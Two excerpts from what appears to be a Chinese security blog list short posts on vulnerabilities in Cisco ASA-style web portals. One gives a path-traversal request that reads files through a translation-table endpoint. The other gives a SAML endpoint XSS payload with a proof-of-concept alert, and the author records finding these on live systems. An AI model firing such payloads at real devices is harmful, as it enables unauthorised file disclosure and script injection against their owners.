路漫漫其修远兮，吾将上下而求索

摘要： 还是刚才的设备，还有漏洞。。。 payload1是 /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 1的部分文件内容截图（这个文件名只是当前的网页 阅读全文

摘要： 今天正好碰到这个系统，找了下存在这个漏洞，记录下 是这个界面的，就打开hackbar，注意url后面部分和post部分 URL部分 /+CSCOE+/saml/sp/acs?tgname=a POST部分 SAMLResponse="><svg/onload=alert('XSSS')> 执行后就会 阅读全文